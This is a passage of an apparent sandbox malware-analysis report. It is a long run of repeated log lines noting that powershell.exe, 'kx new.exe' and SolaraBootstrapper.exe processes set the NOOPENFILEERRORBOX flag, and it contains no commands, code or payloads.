Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\kx new.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\kx new.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
